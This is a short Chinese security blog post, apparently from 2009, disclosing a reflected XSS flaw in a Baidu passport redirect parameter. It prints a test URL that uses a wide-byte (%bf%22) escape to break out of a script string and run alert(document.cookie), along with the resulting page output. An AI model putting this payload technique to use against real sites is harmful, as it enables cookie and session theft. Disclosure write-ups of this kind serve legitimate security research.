百度空间修改资料处XSS
上次提到了此处 http://www.woyigui.cn/hi-baidu-jump/,百度修复了简单的利用方法,但是却没有修复宽字节漏洞。造成一个XSS漏洞。测试URL:
http://passport.baidu.com/ubrwsbas?u_jump_url=%bf%22;alert(document.cookie);</script>
页面输出:
<script> document.domain="baidu.com"; var spRef = "縗";alert(document.cookie);</script>";
转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:百度空间修改资料处XSS
本文地址:http://www.woyigui.cn/2009/04/01/baidu-space-agency-to-amend-the-information-xss/
最新评论